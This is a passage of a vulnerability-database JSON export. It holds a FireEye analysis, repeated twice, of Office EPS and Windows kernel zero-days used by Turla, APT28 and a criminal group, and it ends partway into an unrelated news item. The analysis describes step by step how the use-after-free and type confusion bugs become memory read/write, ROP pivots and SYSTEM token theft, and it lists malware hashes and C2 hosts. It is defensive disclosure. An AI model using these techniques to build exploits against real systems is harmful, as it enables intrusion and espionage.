"obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2017-05-14T18:00:00", "id": "FIREEYE:8B4453AF3FA94076D63CCBDB94AFC782", "href": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-06T23:14:39", "description": "In 2015, FireEye published details about two attacks exploiting vulnerabilities in Encapsulated PostScript (EPS) of Microsoft Office. One was a [zero-day](<https://www.fireeye.com/blog/threat-research/2015/09/attack_exploitingmi.html>) and one was [patched](<https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html>) weeks before the attack launched.\n\nRecently, FireEye identified three new zero-day vulnerabilities in Microsoft Office products that are being exploited in the wild.\n\nAt the end of March 2017, we detected another malicious document leveraging an unknown vulnerability in EPS and a recently [patched](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0001>) vulnerability in Windows Graphics Device Interface (GDI) to drop malware. Following the April 2017 Patch Tuesday, in which Microsoft disabled EPS, FireEye detected a second unknown vulnerability in EPS.\n\nFireEye believes that two actors \u2013 [Turla](<https://www.fireeye.com/content/dam/fireeye-www/company/events/infosec/threat-landscape-overview-fireeye-summit-paris.pdf>) and an unknown financially motivated actor \u2013 were using the first EPS zero-day ([CVE-2017-0261](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0261>)), and [APT28](<https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html>) was using the second EPS zero-day ([CVE-2017-0262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0262>)) along with a new Escalation of Privilege (EOP) zero-day ([CVE-2017-0263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0263>)). Turla and APT28 are Russian cyber espionage groups that have used these zero-days against European diplomatic and military entities. The unidentified financial group targeted regional and global banks with offices in the Middle East. The following is a description of the EPS zero-days, associated malware, and the new EOP zero-day. Each EPS zero-day is accompanied by an EOP exploit, with the EOP being required to escape the sandbox that executes the FLTLDR.EXE instance used for EPS processing.\n\nThe malicious documents have been used to deliver three different payloads. CVE-2017-0261 was used to deliver SHIRIME (Turla) and NETWIRE (unknown financially motivated actor), and CVE-2017-0262 was used to deliver GAMEFISH (APT28). CVE-2017-0263 is used to escalate privileges during the delivery of the GAMEFISH payload.\n\nFireEye [email](<https://www.fireeye.com/products/ex-email-security-products.html>) and [network](<https://www.fireeye.com/products/nx-network-security-products.html>) products detected the malicious documents.\n\nFireEye has been coordinating with the Microsoft Security Response Center (MSRC) for the responsible disclosure of this information. Microsoft advises all customers to follow the guidance in [security advisory ADV170005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170005>) as a defense-in-depth measure against EPS filter vulnerabilities.\n\n#### CVE-2017-0261 \u2013 EPS _\"restore\"_ Use-After-Free\n\nUpon opening the Office document, the FLTLDR.EXE is utilized to render an embedded EPS image, which contains the exploit. The EPS file is a PostScript program, which leverages a Use-After-Free vulnerability in \u201c_restore_\u201d operand.\n\nFrom the [PostScript Manual](<https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf>): \u201cAllocations in local VM and modifications to existing objects in local VM are subject to a feature called **save** and **restore**, named after the operators that invoke it. **save** and **restore** bracket a section of a PostScript language program whose local VM activity is to be encapsulated. **restore** deallocates new objects and undoes modifications to existing objects that were made since the matching **save**.\u201d\n\nAs the manual described, the _restore_ operator will reclaim memory allocated since the _save_ operator. This makes a perfect condition of Use-After-Free, when combined with _forall_ operator. Figure 1 shows the pseudo code to exploit the save and restore operation.\n\nFigure 1: Pseudo code for the exploit\n\nThe following operations allow the Pseudo code to leak metadata enabling a read/write primitive:\n\n 1. forall_proc array is created with a single element of the restore proc\n 2. The EPS state is **_saved_** to eps_state\n 3. uaf_array is created after the save\n 4. The forall operator loops over the elements of the uaf_array calling forall_proc for each element\n 5. The first element of uaf_array is passed to a call of restore_proc, the procedure contained in forall_proc\n 6. restore_proc\n * **_restores_** the initial state freeing the uaf_array\n * The alloc_string procedure reclaims the freed uaf_array\n * The forall_proc is updated to call leak_proc\n 7. Subsequent calls by the forall operator call the leak_proc on each element of the reclaimed uaf_array which elements now contain the result of the alloc_string procedure\n\nFigure 2 demonstrates a debug log of the uaf_array being used after being reclaimed.\n\nFigure 2: uaf_array reclaimed debug log\n\nBy manipulating the operations after the _save_ operator, the attacker is able to manipulate the memory layouts and convert the Use-After-Free to create a read/write primitive. Figure 3 shows the faked string, with length set as 0x7fffffff, base as 0.\n\nFigure 3: Faked String Object\n\nLeveraging the power of reading and writing arbitrary user memory, the EPS program continues by searching for gadgets to build the ROP chain, and creates a **_file_** object. Figure 4 demonstrates the faked file object in memory.\n\nFigure 4: Fake File Object, with ROP\n\nBy calling **_closefile_** operand with the faked file object, the exploit pivots to the ROP and starts the shellcode. Figure 5 shows part of the disassembler of **_closefile_** operand handler.\n\nFigure 5: Stack Pivot disassembler of closefile\n\nOnce execution has been achieved, the malware uses the ROP chain to change the execution protection of the memory region containing the shellcode. At this point, the shellcode is running within a sandbox that was executing FLTLDR.EXE and an escalation of privilege is required to escape that sandbox.\n\nFireEye detected two different versions of the EPS program exploiting this vulnerability. The first, st07383.en17.docx, continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME. SHIRIME is one of multiple custom JavaScript implants used by Turla as a first stage payload to conduct initial profiling of a target system and implement command and control. Since early 2016, we have observed multiple iterations of SHIRIME used in the wild, having the most recent version (v1.0.1004) employed in this zero-day\n\nThe second document, Confirmation_letter.docx, continues by utilizing 32 or 64 bit versions of CVE-2016-7255 to escalate privilege before dropping a new variant of the NETWIRE malware family. Several versions of this document were seen with similar filenames.\n\nThe EPS programs contained within these documents contained different logic to perform the construction of the ROP chain as well as build the shellcode. The first took the additional step of using a simple algorithm, shown in Figure 6, to obfuscate sections of the shellcode.\n\nFigure 6: Shellcode obfuscation algorithm\n\n#### CVE-2017-0262 \u2013 Type Confusion in EPS\n\nThe second EPS vulnerability is a type confused procedure object of forall operator that can alter the execution flow allowing an attacker to control values onto the operand stack. This vulnerability was found in a document named \u201cTrump's_Attack_on_Syria_English.docx\u201d.\n\nBefore triggering the vulnerability, the EPS program sprays the memory with predefined data to occupy specific memory address and facilitate the exploitation. Figure 7 demonstrates the PostScript code snippet of spraying memory with a string.\n\nFigure 7: PostScript code snippet of spray\n\nAfter execution, the content of string occupies the memory at address 0x0d80d000, leading to the memory layout as shown in Figure 8. The exploit leverages this layout and the content to forge a procedure object and manipulate the code flow to store predefined value, in yellow, to the operator stack.\n\nFigure 8: Memory layout of the sprayed data\n\nAfter spraying the heap, the exploit goes on to call a code statement in the following format: _1 array 16#D80D020 forall_. It creates an Array object, sets the procedure as the hex number 0xD80D020, and calls the _forall_ operator. During the operation of the forged procedure within _forall_ operator, it precisely controls the execution flow to store values of the attacker's choices to operand stack. Figure 9 shows the major code flow consuming the forged procedure.\n\nFigure 9: Consuming the forged procedure\n\nAfter execution of _forall_, the contents on the stack are under the attacker's control. This is s shown in Figure 10.\n\nFigure 10: Stack after the forall execution\n\nSince the operand stack has been manipulated, the subsequent operations of _exch_ defines objects based on the data from the manipulated stack, as shown in Figure 11.\n\nFigure 11: Subsequent code to retrieve data from stack\n\nThe A18 is a string type object, which has a length field of 0x7ffffff0, based from 0. Within memory, the layout as shown in Figure 12.\n\nFigure 12: A18 String Object\n\nThe A19 is an array type object, with member values all purposely crafted. The exploit defines another array object and puts it into the forged array A19. By performing these operations, it puts the newly created array object pointer into A19. The exploit can then directly read the value from the predictable address, 0xD80D020 + 0x38, and leak its vftable and infer module base address of EPSIMP32.flt. Figure 13 shows code snippets of leaking EPSIMP32 base address.\n\nFigure 13: Code snippet of leaking module base\n\nFigure 14 shows the operand stack of calling _put_ operator and the forged Array A19 after finishing the _put_ operation.\n\nFigure 14: Array A19 after the put operation\n\nBy leveraging the RW primitive string and the leaked module base of EPSIMP32, the exploit continues by searching ROP gadgets, creating a fake file object, and pivoting to shellcode through the _bytesavailable_ operator. Figure 15 shows the forged file type object and disassembling of pivoting to ROP and shellcode.\n\nFigure 15: Pivots to ROP and Shellcode\n\nThe shellcode continues by using a previously unknown EOP, CVE-2017-0263, to escalate privileges to escape the sandbox running FLTLDR.EXE, and then drop and execute a GAMEFISH payload. Only a 32-bit version of CVE-2017-0263 is contained in the shellcode.\n\n#### CVE-2017-0263 \u2013 win32k!xxxDestroyWindow Use-After-Free\n\nThe EOP Exploit setup starts by suspending all threads other than the current thread and saving the thread handles to a table, as shown in Figure 16.\n\n\n\nFigure 16: Suspending Threads\n\nThe exploit then checks for OS version and uses that information to populate version specific fields such as token offset, syscall number, etc. An executable memory area is allocated and populated with kernel mode shellcode as wells as address information required by the shellcode. A new thread is created for triggering the vulnerability and further control of exploitation.\n\nThe exploit starts by creating three PopupMenus and appending menus to them, as shown in Figure 17. The exploit creates 0x100 windows with random classnames. The User32!HMValidateHandle trick is used to leak the tagWnd address, which is used as kernel information leak throughout the exploit.\n\nFigure 17: Popup menu creation\n\nRegisterClassExW is then used to register a window class \u201cMain_Window_Class\u201d with a WndProc pointing to a function, which calls DestroyWindow on window table created by EventHookProc, explained later in the blog. This function also shows the first popup menu, which was created earlier.\n\nTwo extra windows are created with class name as \u201cMain_Window_Class\u201d. SetWindowLong is used to change WndProc of second window, wnd2, to a shellcode address. An application defined hook, WindowHookProc, and an event hook, EventHookProc, are installed by SetWindowsHookExW and SetWinEventHook respectively. PostMessage is used to post 0xABCD to first window, wnd1.\n\nThe EventHookProc waits for EVENT_SYSTEM_MENUPOPUPSTART and saves the window\u2019s handle to a table. WindowHookProc looks for **SysShadow **classname and sets a new WndProc for the corresponding window. Inside this WndProc, NtUserMNDragLeave syscall is invoked and SendMessage is used to send 0x9f9f to wnd2, invoking the shellcode shown in Figure 18.\n\n\n\nFigure 18: Triggering the shellcode\n\nThe Use-After-Free happens inside WM_NCDESTROY event in kernel and overwrites wnd2\u2019s tagWnd structure, which sets bServerSideWindowProc flag. With bServerSideWindowProc set, the user mode WndProc is considered as a kernel callback and will be invoked from kernel context \u2013 in this case wnd2\u2019s WndProc is the shellcode.\n\nThe shellcode checks whether the memory corruption has occurred by checking if the code segment is not the user mode code segment. It also checks whether the message sent is 0x9f9f. Once the validation is completed, shellcode finds the TOKEN address of current process and TOKEN of system process (pid 4). The shellcode then copies the system process\u2019 token to current process, which elevates current process privilege to SYSTEM.\n\n#### Conclusion\n\n_EPS processing has become a ripe exploitation space for attackers._\n\nFireEye has discovered and analyzed two of these recent EPS zero-days with examples seen before and after Microsoft disabled EPS processing in the April 2017 Patch Tuesday. The documents explored utilize differing EPS exploits, ROP construction, shellcode, EOP exploits and final payloads. While these documents are detected by FireEye appliances, users should exercise caution because FLTLDR.EXE is not monitored by EMET.\n\n_Russian cyber espionage is a well-resourced, dynamic threat_\n\nThe use of zero-day exploits by Turla Group and APT28 underscores their capacity to apply technically sophisticated and costly methods when necessary. Russian cyber espionage actors use zero-day exploits in addition to less complex measures. Though these actors have relied on credential phishing and macros to carry out operations previously, the use of these methods does not reflect a lack of resources. Rather, the use of less technically sophisticated methods \u2013 when sufficient \u2013 reflects operational maturity and the foresight to protect costly exploits until they are necessary.\n\n_A vibrant ecosystem of threats_\n\nCVE-2017-0261\u2019s use by multiple actors is further evidence that cyber espionage and criminal activity exist in a shared ecosystem. Nation state actors, such as those leveraging [CVE-2017-0199 to distribute FINSPY](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html>), often rely on the same sources for exploits as criminal actors. This shared ecosystem creates a proliferation problem for defenders concerned with either type of threat.\n\nCVE-2017-0261 was being used as a zero-day by both nation state and cyber crime actors, and we believe that both actors obtained the vulnerability from a common source. Following [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>), this is the second major vulnerability in as many months that has been used for both espionage and crime.\n\n**MD5**\n\n| \n\n**Filename**\n\n| \n\n**C2 Host** \n \n---|---|--- \n \n2abe3cc4bff46455a945d56c27e9fb45\n\n| \n\nConfirmation_letter.docx.bin\n\n(NETWIRE)\n\n| \n\n84.200.2.12 \n \ne091425d23b8db6082b40d25e938f871\n\n| \n\nConfirmation_letter.docx\n\n(NETWIRE)\n\n| \n\n138.201.44.30 \n \n006bdb19b6936329bffd4054e270dc6a\n\n| \n\nConfirmation_letter_ACM.docx\n\n(NETWIRE)\n\n| \n\n185.106.122.113 \n \n15660631e31c1172ba5a299a90938c02\n\n| \n\nst07383.en17.docx\n\n(SHIRIME)\n\n| \n\ntnsc.webredirect.org \n \nf8e92d8b5488ea76c40601c8f1a08790\n\n| \n\nTrump's_Attack_on_Syria_English.docx\n\n(GAMEFISH)\n\n| \n\nwmdmediacodecs.com \n \nTable 1: Source Exploit Documents\n\nTable 2: CVEs related to these attacks\n\n#### Acknowledgements\n\niSIGHT Intelligence Team, FLARE Team, FireEye Labs, Microsoft Security Response Center (MSRC).\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T13:00:00", "type": "fireeye", "title": "EPS Processing Zero-Days Exploited by Multiple Threat Actors ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0001", "CVE-2017-0263", "CVE-2017-0199", "CVE-2016-7255", "CVE-2017-0262", "CVE-2017-0261"], "modified": "2017-05-09T13:00:00", "id": "FIREEYE:AA5B50E5C593F4E6EFF300E3DE9EDB85", "href": "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:21", "description": "In 2015, FireEye published details about two attacks exploiting vulnerabilities in Encapsulated PostScript (EPS) of Microsoft Office. One was a [zero-day](<https://www.fireeye.com/blog/threat-research/2015/09/attack_exploitingmi.html>) and one was [patched](<https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html>) weeks before the attack launched.\n\nRecently, FireEye identified three new zero-day vulnerabilities in Microsoft Office products that are being exploited in the wild.\n\nAt the end of March 2017, we detected another malicious document leveraging an unknown vulnerability in EPS and a recently [patched](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0001>) vulnerability in Windows Graphics Device Interface (GDI) to drop malware. Following the April 2017 Patch Tuesday, in which Microsoft disabled EPS, FireEye detected a second unknown vulnerability in EPS.\n\nFireEye believes that two actors \u2013 [Turla](<https://www.fireeye.com/content/dam/fireeye-www/company/events/infosec/threat-landscape-overview-fireeye-summit-paris.pdf>) and an unknown financially motivated actor \u2013 were using the first EPS zero-day ([CVE-2017-0261](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0261>)), and [APT28](<https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html>) was using the second EPS zero-day ([CVE-2017-0262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0262>)) along with a new Escalation of Privilege (EOP) zero-day ([CVE-2017-0263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0263>)). Turla and APT28 are Russian cyber espionage groups that have used these zero-days against European diplomatic and military entities. The unidentified financial group targeted regional and global banks with offices in the Middle East. The following is a description of the EPS zero-days, associated malware, and the new EOP zero-day. Each EPS zero-day is accompanied by an EOP exploit, with the EOP being required to escape the sandbox that executes the FLTLDR.EXE instance used for EPS processing.\n\nThe malicious documents have been used to deliver three different payloads. CVE-2017-0261 was used to deliver SHIRIME (Turla) and NETWIRE (unknown financially motivated actor), and CVE-2017-0262 was used to deliver GAMEFISH (APT28). CVE-2017-0263 is used to escalate privileges during the delivery of the GAMEFISH payload.\n\nFireEye [email](<https://www.fireeye.com/products/ex-email-security-products.html>) and [network](<https://www.fireeye.com/products/nx-network-security-products.html>) products detected the malicious documents.\n\nFireEye has been coordinating with the Microsoft Security Response Center (MSRC) for the responsible disclosure of this information. Microsoft advises all customers to follow the guidance in [security advisory ADV170005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170005>) as a defense-in-depth measure against EPS filter vulnerabilities.\n\n#### CVE-2017-0261 \u2013 EPS _\"restore\"_ Use-After-Free\n\nUpon opening the Office document, the FLTLDR.EXE is utilized to render an embedded EPS image, which contains the exploit. The EPS file is a PostScript program, which leverages a Use-After-Free vulnerability in \u201c_restore_\u201d operand.\n\nFrom the [PostScript Manual](<https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf>): \u201cAllocations in local VM and modifications to existing objects in local VM are subject to a feature called **save** and **restore**, named after the operators that invoke it. **save** and **restore** bracket a section of a PostScript language program whose local VM activity is to be encapsulated. **restore** deallocates new objects and undoes modifications to existing objects that were made since the matching **save**.\u201d\n\nAs the manual described, the _restore_ operator will reclaim memory allocated since the _save_ operator. This makes a perfect condition of Use-After-Free, when combined with _forall_ operator. Figure 1 shows the pseudo code to exploit the save and restore operation.\n\nFigure 1: Pseudo code for the exploit\n\nThe following operations allow the Pseudo code to leak metadata enabling a read/write primitive:\n\n 1. forall_proc array is created with a single element of the restore proc\n 2. The EPS state is **_saved_** to eps_state\n 3. uaf_array is created after the save\n 4. The forall operator loops over the elements of the uaf_array calling forall_proc for each element\n 5. The first element of uaf_array is passed to a call of restore_proc, the procedure contained in forall_proc\n 6. restore_proc\n * **_restores_** the initial state freeing the uaf_array\n * The alloc_string procedure reclaims the freed uaf_array\n * The forall_proc is updated to call leak_proc\n 7. Subsequent calls by the forall operator call the leak_proc on each element of the reclaimed uaf_array which elements now contain the result of the alloc_string procedure\n\nFigure 2 demonstrates a debug log of the uaf_array being used after being reclaimed.\n\nFigure 2: uaf_array reclaimed debug log\n\nBy manipulating the operations after the _save_ operator, the attacker is able to manipulate the memory layouts and convert the Use-After-Free to create a read/write primitive. Figure 3 shows the faked string, with length set as 0x7fffffff, base as 0.\n\nFigure 3: Faked String Object\n\nLeveraging the power of reading and writing arbitrary user memory, the EPS program continues by searching for gadgets to build the ROP chain, and creates a **_file_** object. Figure 4 demonstrates the faked file object in memory.\n\nFigure 4: Fake File Object, with ROP\n\nBy calling **_closefile_** operand with the faked file object, the exploit pivots to the ROP and starts the shellcode. Figure 5 shows part of the disassembler of **_closefile_** operand handler.\n\nFigure 5: Stack Pivot disassembler of closefile\n\nOnce execution has been achieved, the malware uses the ROP chain to change the execution protection of the memory region containing the shellcode. At this point, the shellcode is running within a sandbox that was executing FLTLDR.EXE and an escalation of privilege is required to escape that sandbox.\n\nFireEye detected two different versions of the EPS program exploiting this vulnerability. The first, st07383.en17.docx, continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME. SHIRIME is one of multiple custom JavaScript implants used by Turla as a first stage payload to conduct initial profiling of a target system and implement command and control. Since early 2016, we have observed multiple iterations of SHIRIME used in the wild, having the most recent version (v1.0.1004) employed in this zero-day\n\nThe second document, Confirmation_letter.docx, continues by utilizing 32 or 64 bit versions of CVE-2016-7255 to escalate privilege before dropping a new variant of the NETWIRE malware family. Several versions of this document were seen with similar filenames.\n\nThe EPS programs contained within these documents contained different logic to perform the construction of the ROP chain as well as build the shellcode. The first took the additional step of using a simple algorithm, shown in Figure 6, to obfuscate sections of the shellcode.\n\nFigure 6: Shellcode obfuscation algorithm\n\n#### CVE-2017-0262 \u2013 Type Confusion in EPS\n\nThe second EPS vulnerability is a type confused procedure object of forall operator that can alter the execution flow allowing an attacker to control values onto the operand stack. This vulnerability was found in a document named \u201cTrump's_Attack_on_Syria_English.docx\u201d.\n\nBefore triggering the vulnerability, the EPS program sprays the memory with predefined data to occupy specific memory address and facilitate the exploitation. Figure 7 demonstrates the PostScript code snippet of spraying memory with a string.\n\nFigure 7: PostScript code snippet of spray\n\nAfter execution, the content of string occupies the memory at address 0x0d80d000, leading to the memory layout as shown in Figure 8. The exploit leverages this layout and the content to forge a procedure object and manipulate the code flow to store predefined value, in yellow, to the operator stack.\n\nFigure 8: Memory layout of the sprayed data\n\nAfter spraying the heap, the exploit goes on to call a code statement in the following format: _1 array 16#D80D020 forall_. It creates an Array object, sets the procedure as the hex number 0xD80D020, and calls the _forall_ operator. During the operation of the forged procedure within _forall_ operator, it precisely controls the execution flow to store values of the attacker's choices to operand stack. Figure 9 shows the major code flow consuming the forged procedure.\n\nFigure 9: Consuming the forged procedure\n\nAfter execution of _forall_, the contents on the stack are under the attacker's control. This is s shown in Figure 10.\n\nFigure 10: Stack after the forall execution\n\nSince the operand stack has been manipulated, the subsequent operations of _exch_ defines objects based on the data from the manipulated stack, as shown in Figure 11.\n\nFigure 11: Subsequent code to retrieve data from stack\n\nThe A18 is a string type object, which has a length field of 0x7ffffff0, based from 0. Within memory, the layout as shown in Figure 12.\n\nFigure 12: A18 String Object\n\nThe A19 is an array type object, with member values all purposely crafted. The exploit defines another array object and puts it into the forged array A19. By performing these operations, it puts the newly created array object pointer into A19. The exploit can then directly read the value from the predictable address, 0xD80D020 + 0x38, and leak its vftable and infer module base address of EPSIMP32.flt. Figure 13 shows code snippets of leaking EPSIMP32 base address.\n\nFigure 13: Code snippet of leaking module base\n\nFigure 14 shows the operand stack of calling _put_ operator and the forged Array A19 after finishing the _put_ operation.\n\nFigure 14: Array A19 after the put operation\n\nBy leveraging the RW primitive string and the leaked module base of EPSIMP32, the exploit continues by searching ROP gadgets, creating a fake file object, and pivoting to shellcode through the _bytesavailable_ operator. Figure 15 shows the forged file type object and disassembling of pivoting to ROP and shellcode.\n\nFigure 15: Pivots to ROP and Shellcode\n\nThe shellcode continues by using a previously unknown EOP, CVE-2017-0263, to escalate privileges to escape the sandbox running FLTLDR.EXE, and then drop and execute a GAMEFISH payload. Only a 32-bit version of CVE-2017-0263 is contained in the shellcode.\n\n#### CVE-2017-0263 \u2013 win32k!xxxDestroyWindow Use-After-Free\n\nThe EOP Exploit setup starts by suspending all threads other than the current thread and saving the thread handles to a table, as shown in Figure 16.\n\n\n\nFigure 16: Suspending Threads\n\nThe exploit then checks for OS version and uses that information to populate version specific fields such as token offset, syscall number, etc. An executable memory area is allocated and populated with kernel mode shellcode as wells as address information required by the shellcode. A new thread is created for triggering the vulnerability and further control of exploitation.\n\nThe exploit starts by creating three PopupMenus and appending menus to them, as shown in Figure 17. The exploit creates 0x100 windows with random classnames. The User32!HMValidateHandle trick is used to leak the tagWnd address, which is used as kernel information leak throughout the exploit.\n\nFigure 17: Popup menu creation\n\nRegisterClassExW is then used to register a window class \u201cMain_Window_Class\u201d with a WndProc pointing to a function, which calls DestroyWindow on window table created by EventHookProc, explained later in the blog. This function also shows the first popup menu, which was created earlier.\n\nTwo extra windows are created with class name as \u201cMain_Window_Class\u201d. SetWindowLong is used to change WndProc of second window, wnd2, to a shellcode address. An application defined hook, WindowHookProc, and an event hook, EventHookProc, are installed by SetWindowsHookExW and SetWinEventHook respectively. PostMessage is used to post 0xABCD to first window, wnd1.\n\nThe EventHookProc waits for EVENT_SYSTEM_MENUPOPUPSTART and saves the window\u2019s handle to a table. WindowHookProc looks for **SysShadow **classname and sets a new WndProc for the corresponding window. Inside this WndProc, NtUserMNDragLeave syscall is invoked and SendMessage is used to send 0x9f9f to wnd2, invoking the shellcode shown in Figure 18.\n\n\n\nFigure 18: Triggering the shellcode\n\nThe Use-After-Free happens inside WM_NCDESTROY event in kernel and overwrites wnd2\u2019s tagWnd structure, which sets bServerSideWindowProc flag. With bServerSideWindowProc set, the user mode WndProc is considered as a kernel callback and will be invoked from kernel context \u2013 in this case wnd2\u2019s WndProc is the shellcode.\n\nThe shellcode checks whether the memory corruption has occurred by checking if the code segment is not the user mode code segment. It also checks whether the message sent is 0x9f9f. Once the validation is completed, shellcode finds the TOKEN address of current process and TOKEN of system process (pid 4). The shellcode then copies the system process\u2019 token to current process, which elevates current process privilege to SYSTEM.\n\n#### Conclusion\n\n_EPS processing has become a ripe exploitation space for attackers._\n\nFireEye has discovered and analyzed two of these recent EPS zero-days with examples seen before and after Microsoft disabled EPS processing in the April 2017 Patch Tuesday. The documents explored utilize differing EPS exploits, ROP construction, shellcode, EOP exploits and final payloads. While these documents are detected by FireEye appliances, users should exercise caution because FLTLDR.EXE is not monitored by EMET.\n\n_Russian cyber espionage is a well-resourced, dynamic threat_\n\nThe use of zero-day exploits by Turla Group and APT28 underscores their capacity to apply technically sophisticated and costly methods when necessary. Russian cyber espionage actors use zero-day exploits in addition to less complex measures. Though these actors have relied on credential phishing and macros to carry out operations previously, the use of these methods does not reflect a lack of resources. Rather, the use of less technically sophisticated methods \u2013 when sufficient \u2013 reflects operational maturity and the foresight to protect costly exploits until they are necessary.\n\n_A vibrant ecosystem of threats_\n\nCVE-2017-0261\u2019s use by multiple actors is further evidence that cyber espionage and criminal activity exist in a shared ecosystem. Nation state actors, such as those leveraging [CVE-2017-0199 to distribute FINSPY](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html>), often rely on the same sources for exploits as criminal actors. This shared ecosystem creates a proliferation problem for defenders concerned with either type of threat.\n\nCVE-2017-0261 was being used as a zero-day by both nation state and cyber crime actors, and we believe that both actors obtained the vulnerability from a common source. Following [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>), this is the second major vulnerability in as many months that has been used for both espionage and crime.\n\n**MD5**\n\n| \n\n**Filename**\n\n| \n\n**C2 Host** \n \n---|---|--- \n \n2abe3cc4bff46455a945d56c27e9fb45\n\n| \n\nConfirmation_letter.docx.bin\n\n(NETWIRE)\n\n| \n\n84.200.2.12 \n \ne091425d23b8db6082b40d25e938f871\n\n| \n\nConfirmation_letter.docx\n\n(NETWIRE)\n\n| \n\n138.201.44.30 \n \n006bdb19b6936329bffd4054e270dc6a\n\n| \n\nConfirmation_letter_ACM.docx\n\n(NETWIRE)\n\n| \n\n185.106.122.113 \n \n15660631e31c1172ba5a299a90938c02\n\n| \n\nst07383.en17.docx\n\n(SHIRIME)\n\n| \n\ntnsc.webredirect.org \n \nf8e92d8b5488ea76c40601c8f1a08790\n\n| \n\nTrump's_Attack_on_Syria_English.docx\n\n(GAMEFISH)\n\n| \n\nwmdmediacodecs.com \n \nTable 1: Source Exploit Documents\n\nTable 2: CVEs related to these attacks\n\n#### Acknowledgements\n\niSIGHT Intelligence Team, FLARE Team, FireEye Labs, Microsoft Security Response Center (MSRC).\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T13:00:00", "type": "fireeye", "title": "EPS Processing Zero-Days Exploited by Multiple Threat Actors ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0001", "CVE-2017-0263", "CVE-2017-0199", "CVE-2016-7255", "CVE-2017-0262", "CVE-2017-0261"], "modified": "2017-05-09T13:00:00", "id": "FIREEYE:35D0439B3D476357F4D2F51F3D5CD294", "href": "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T09:18:01", "description": "[](<https://1.bp.blogspot.com/-YHGy8IvdU5A/WCNWb0AOdHI/AAAAAAAAqLQ/ZFC2_5FuLBsj06QydsVi5k6oMzvGFz5vACLcB/s1600/microsoft-security-update.png>)\n\nMicrosoft was very upset with Google last week when its Threat Analysis Group publically disclosed a critical [Windows kernel vulnerability](<https://thehackernews.com/2016/10/google-windows-zero-day.html>) (CVE-2016-7255) that had yet to be patched. \n \nThe company [criticized Google's move](<https://thehackernews.com/2016/11/windows-zeroday-exploit.html>), 